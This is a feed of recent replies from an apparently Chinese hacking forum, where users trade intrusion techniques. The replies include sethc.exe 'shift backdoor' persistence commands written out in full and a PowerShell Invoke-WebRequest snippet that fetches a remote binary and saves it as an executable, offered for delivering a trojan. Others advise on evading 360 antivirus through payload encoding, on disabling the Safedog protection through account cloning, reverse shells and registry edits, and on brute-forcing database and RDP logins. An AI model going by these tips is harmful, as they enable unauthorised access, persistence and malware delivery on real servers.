最新回复

  • 帖子作者
    回复
  • #690309

    9次也不一定能过杀软,我前一阵子测试过360,好像是12次还是15次,但是编码次数多了执行几条命令就特别卡,而且容易掉线

  • #689638

    https://github.com/l3m0n/Bypass_Disable_functions_Shell/blob/master/bypass_function.md

  • #687848

    information_schema能过?好nb啊

  • #687276

    powershell不行么?https://evi1cg.me/archives/Compile_Your_Powreshell_Script.html看一下这篇文章一般来讲这种应该是没问题而且不分系统版本的把

  • #687188

    你把他服务器的PHP配置改了,直接打dos了就重启了,机器重启Apache2自然也就重启了,不过不推荐这种方法,但是特殊情况的时候可以考虑这招

  • #687274

    回复 13# LWTFQ 那你为什么要用.nsf的shell呢?确保这个没有问题的么?在一个就是看你能执行命令加上system,估计也可以写文件,不妨先留一个shift后门,以下是百度随手搜到的copy c:\windows\explorer.exe c:\windows\system32\sethc.execopy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exeattrib c:\windows\system32\sethc.exe +hattrib c:\windows\system32\dllcache\sethc.exe +h然后开33891.通用开3 ...

  • #687198

    $ie = Invoke-WebRequest https://ub3r.cn/c.ps1$dst = “C:\Users\ub3r\Desktop\cmd4.exe”::WriteAllBytes($dst, $ie.Content)我在本地测试这段代码可以生成一个cmd.exehttps://ub3r.cn/c.ps1是我把win10的cmd.exe改了个后缀$dst是我写文件到本地的路径原理就是用powershell去请求远程一个公网上的文件,文件内容是二进制可执行文件的二进制内容,我这里就是cmd.exe的内容,你改成你要弹的马就可以了,,然后请求回来的数据保存 ...

  • #687079

    重新登陆确实可以直接刷新,感谢几位diao大的兄弟

  • #687215

    老哥,来份源码可行?想看看C#这个东西写gui的

  • #687225

    https://github.com/facebook/fbctfhttps://github.com/CTFd/CTFd都可以

  • #687228

    flag不都是flag{**********}这类的么?就没见过key{**}这样的……

  • #685217

    杀软怎么说?

  • #687216

    回复 32# otex911 部署一个msf就可以了啊

  • #687229

    楼主你看一下github上更新了,py参数变化了,这个怎么破还有你遇到过什么code.exe巴拉巴拉的错误么?

  • #684199

    阿里云已拦截

  • #684037

    1.安全狗默认只拦截加管理组,不拦截加用户 法a:利用用户克隆exp:直接克隆administrator的权限 法b:反弹shell读取管理员密码 法c:改注册表替换安全狗的文件,然后重启服务器(redegit /s redegit.reg(redegit.reg见附录))安全狗关闭2.安全狗账号防护最严程度:拦截添加用户 法a:激活guest,然后克隆用户 法b:反弹shell读取管理员密码 法c:改注册表,重启服务器,关闭安全狗https://bugs.hacking8.com/tiquan/?m=killdo ...

  • #682526

    回复 7# Taroxxx 果然是墙掉了,只墙掉了mysql连接,其余的端口服务都还可以访问,

  • #682551

    回复 11# sm0nk 这个是干啥用的?我不只是要爆破3306 rdp 啥的1433都要爆破,能用吗?

  • #682028

    回复 2# SmallCat sqlmap怎么用udf?老哥给个链接学习下呗~

  • #682030

    你可以先去看一看这个文件是否写成功,我遇到过一次sqlmap写文件失败,但后来拿到shell发现sqlmap已经成功写入